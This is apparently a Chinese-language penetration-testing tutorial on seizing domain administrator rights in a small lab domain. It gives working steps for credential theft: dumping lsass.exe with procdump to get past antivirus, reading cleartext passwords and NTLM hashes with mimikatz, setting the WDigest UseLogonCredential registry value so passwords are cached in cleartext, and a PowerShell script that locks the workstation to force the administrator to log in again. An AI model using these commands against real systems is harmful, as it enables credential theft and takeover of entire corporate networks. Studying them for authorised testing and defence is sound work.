搭建虚拟环境
【域控】,192.168.10.3
【域成员】,192.168.10.4
工具
mimikatz
procdump64
在域渗透中、作为渗透测试人员,获取域控的权限基本上可以获取整个内网的权限。在大多数情况下,攻击者可以通过定位域管理员所登录的服务器,利用漏洞获取服务器system权限,找到域管理的账号、进程或是身份验证令牌,从而获取域管理员权限。本文分享几种常见的获取域管理员权限的方式。
方法 一 :通过高权限读取本地密码
当域管理员在域成员机器上登录进行工作的时候,会将明文密码保存在本地进行的lsass.exe,可以通过mimikatz来读取到本地的明文密码。
如果说,没有出现密码,那么大概率就是版本问题了。
实战中,会有很多可能出现,比如捕获不到明文密码,可以尝试从NTLM入手。
可以通过md5网站进行解密成明文。
如果主机存在杀软的时候,上传mimikatz很多时候都会被杀掉,可以通过procdump+mimikatz的方式进行绕过。
先导出lsass.exe,保存到本地,通过mimikatz读lsass.dmp的明文
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
如果目标机器是windows server 2012,通过添加注册表,在通过锁屏,让管理员重新登录及可以读取明文。
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" >1.txt
添加注册表,设置UseLogonCredential设置为1
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
利用powershell脚本进行锁屏
Function Lock-WorkStation
{
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
$LockWorkStation = Add-Type -memberDefinition $signature -name
"Win32LockWorkStation" -namespace Win32Functions -passthru
$LockWorkStation::LockWorkStation() | Out-Null
}
Lock-WorkStation
管理员重新登录后就可以抓取到明文密码了。
删除连接过程。
